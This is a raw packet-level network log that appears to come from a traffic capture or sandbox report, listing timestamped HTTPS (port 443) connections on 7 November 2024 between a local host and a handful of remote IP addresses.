                                                                Nov 7, 2024 21:40:57.477385998 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.477698088 CET49765443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.477751017 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.477834940 CET49765443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.519331932 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.625585079 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.625648975 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.625710011 CET49765443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.626229048 CET49765443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.626243114 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.629204035 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.629246950 CET44349766188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.629333019 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.629698992 CET49767443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:57.629735947 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.629796028 CET49767443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:57.630095005 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.630110979 CET44349766188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.630645037 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.630691051 CET44349768188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.630749941 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.630860090 CET49767443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:57.630875111 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.631082058 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.631098032 CET44349768188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.631567001 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.631576061 CET44349769188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.631628036 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.631855965 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.631865978 CET44349769188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.228224039 CET44349769188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.228662014 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.228688002 CET44349769188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.229774952 CET44349769188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.229877949 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.230170012 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.230182886 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.230235100 CET44349769188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.230240107 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.230293989 CET49769443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.230659008 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.230689049 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.230773926 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.230974913 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.230986118 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.246547937 CET44349768188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.246850014 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.246892929 CET44349768188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.247874975 CET44349768188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.247945070 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.248233080 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.248255968 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.248286009 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.248300076 CET44349768188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.248353958 CET49768443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.269522905 CET44349766188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.269880056 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.269901037 CET44349766188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.270334005 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.270370960 CET44349772188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.270452023 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.270657063 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.270670891 CET44349772188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.270785093 CET44349766188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.270848989 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.271215916 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.271234989 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.271281958 CET44349766188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.271284103 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.271331072 CET49766443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.271593094 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.271615982 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.271734953 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.271951914 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.271966934 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.292387009 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.292742014 CET49767443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:58.292757988 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.293054104 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.293385983 CET49767443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:58.293440104 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.293530941 CET49767443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:58.335340023 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.440741062 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.440809011 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.440963030 CET49767443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:58.441596031 CET49767443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:58.441610098 CET44349767188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.851826906 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.852225065 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.852251053 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.853146076 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.853218079 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.853498936 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.853545904 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.853684902 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.853693008 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.881123066 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.881357908 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.881371975 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.882230043 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.882303953 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.882560968 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.882615089 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.882721901 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.882730007 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.904695034 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.924552917 CET44349772188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.924824953 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.924849987 CET44349772188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.925846100 CET44349772188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.925920010 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.926321030 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.926377058 CET44349772188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.926628113 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.926635027 CET44349772188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:58.936697006 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:58.968723059 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:01.579739094 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:01.579780102 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:01.579854965 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:01.580063105 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:01.580073118 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.194214106 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.194628000 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.194653988 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.195635080 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.195714951 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.196861029 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.196918964 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.197020054 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.197026014 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.242778063 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.343828917 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.344223976 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.344254971 CET4434977435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.344312906 CET49774443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.344645977 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.344676971 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.344747066 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.344955921 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.344968081 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.770540953 CET49776443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:41:02.770589113 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:02.770721912 CET49776443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:41:02.771097898 CET49776443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:41:02.771112919 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:02.973814011 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.974127054 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.974145889 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.975187063 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.975284100 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.975567102 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.975635052 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.975701094 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:02.975708008 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:03.024672985 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:03.124696970 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:03.125020981 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:03.125077009 CET4434977535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:41:03.125138044 CET49775443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:41:03.651557922 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:03.651844025 CET49776443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:41:03.651869059 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:03.652158976 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:03.652484894 CET49776443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:41:03.652539015 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:03.694761992 CET49776443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:41:13.648994923 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:13.649050951 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:13.649139881 CET49776443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:41:14.116266966 CET49776443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:41:14.116302013 CET44349776142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:41:18.256079912 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.256145000 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.256211042 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.256722927 CET49771443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.256737947 CET44349771188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.257508039 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.257561922 CET44349777188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.257632017 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.257958889 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.257976055 CET44349777188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.345894098 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.345985889 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.346065044 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.346492052 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.346509933 CET44349773188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.346518040 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.346560955 CET49773443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.347729921 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.347763062 CET44349778188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.347845078 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.348222017 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.348236084 CET44349778188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.914189100 CET44349777188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.914627075 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.914664984 CET44349777188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.915540934 CET44349777188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.915613890 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.916105986 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.916119099 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.916162014 CET44349777188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.916187048 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.916215897 CET49777443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.916594028 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.916621923 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.916686058 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.916909933 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.916924000 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.952034950 CET44349778188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.952280998 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.952294111 CET44349778188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.953140974 CET44349778188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.953227997 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.953546047 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.953596115 CET44349778188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.953603983 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.953689098 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.953696966 CET44349778188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.953705072 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.953747988 CET49778443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.954022884 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.954055071 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:18.954123974 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.954315901 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:18.954327106 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.534147978 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.534497023 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.534527063 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.535434008 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.535509109 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.535999060 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.536055088 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.536186934 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.536195040 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.581190109 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.581554890 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.581568003 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.582449913 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.582550049 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.583477020 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.583529949 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.583857059 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.583863974 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.587538004 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.635591984 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.681926966 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.682007074 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.682086945 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.682882071 CET49779443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:19.682902098 CET44349779188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.685503960 CET49781443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:19.685554028 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:19.685648918 CET49781443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:19.685847044 CET49781443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:19.685861111 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.340466022 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.340775013 CET49781443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:20.340792894 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.341075897 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.341382027 CET49781443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:20.341447115 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.341519117 CET49781443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:20.387334108 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.522140026 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.522205114 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.522262096 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.522780895 CET49780443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.522798061 CET44349780188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.525492907 CET49782443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:20.525527000 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.525609016 CET49782443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:20.525914907 CET49782443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:20.525927067 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.531740904 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.531863928 CET44349772188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.531950951 CET49772443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.535358906 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.535393953 CET44349783188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.535463095 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.535521984 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.535528898 CET44349784188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.535579920 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.535876036 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.535897017 CET44349783188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.536094904 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:20.536103964 CET44349784188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.582333088 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.582400084 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:20.582468033 CET49781443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:20.583101034 CET49781443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:20.583122015 CET44349781188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.133265972 CET44349783188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.133632898 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.133658886 CET44349783188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.134743929 CET44349783188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.134825945 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.135113001 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.135123968 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.135175943 CET44349783188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.135176897 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.135240078 CET49783443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.135504961 CET49785443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.135596037 CET44349785188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.135684013 CET49785443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.135874033 CET49785443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.135889053 CET44349785188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.162698984 CET44349784188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.162933111 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.162949085 CET44349784188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.163826942 CET44349784188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.163902044 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.164160013 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.164171934 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.164211035 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.164221048 CET44349784188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.164290905 CET49784443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.164464951 CET49786443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.164488077 CET44349786188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.164551973 CET49786443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.164736032 CET49786443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.164743900 CET44349786188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.174933910 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.175158024 CET49782443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:21.175164938 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.175447941 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.175724983 CET49782443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:21.175775051 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.175860882 CET49782443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:41:21.219331980 CET44349782188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.224611044 CET49787443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.224641085 CET44349787188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.224725962 CET49787443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.224977016 CET49787443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.224989891 CET44349787188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.758423090 CET44349785188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.758765936 CET49785443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:41:21.758786917 CET44349785188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:41:21.759780884 CET44349785188.114.97.3192.168.2.16
